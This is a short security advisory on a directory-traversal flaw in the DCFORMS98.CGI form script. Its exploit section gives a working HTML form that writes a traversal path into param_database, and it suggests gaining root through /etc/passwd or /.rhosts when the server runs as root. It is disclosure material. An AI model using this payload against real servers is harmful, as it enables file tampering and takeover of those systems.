suid@suid.kg - mini advisory - DCFORMS98.CGI 

Software: 	DCFORMS98.CGI 
Vendor:		dcscripts.com
URL:		http://www.dcscripts.com/dcforms98.shtml	
Version:	Version 1.0
Platforms:	Unix
Type:		Input validation problem

Summary:

	Anyone can create / truncate any file owned
	by the web server user (nobody/apache/whatever).

Vulnerability:

	The perl code does no input validation so reverse directory
	transversal is possible when specifying a `param_database`.

Exploit:

	Build a HTML form resembling:

	<form action=/cgi-bin/dcforms98.cgi method=post>
	<INPUT TYPE="hidden" name="param_recipient" value="non@existant">
	<INPUT TYPE="hidden" name="param_subject" value="X">
	<INPUT TYPE="hidden" name="param_env_report" value="">
	<INPUT TYPE="hidden" name="param_order" value="Name">

	<!-- This is obviously the problem -->
	<INPUT TYPE="hidden" name="param_database"
		value="../../../../../../../../../../tmp/xxx">


	<INPUT TYPE="hidden" name="param_required" value="Name">
	<INPUT TYPE="hidden" name="param_redirect_url" value="">
	<input type=hidden name=Name value=blah>
	<input type=submit>
	</form>                             

	If httpd is running with UID == 0, you could easily get root
	by adding to the passwd file or /.rhosts.

	Of course you could simply send this in a POST request directly
	to the web server. Whatever.

http://www.suid.edu/advisories/005.txt

EOF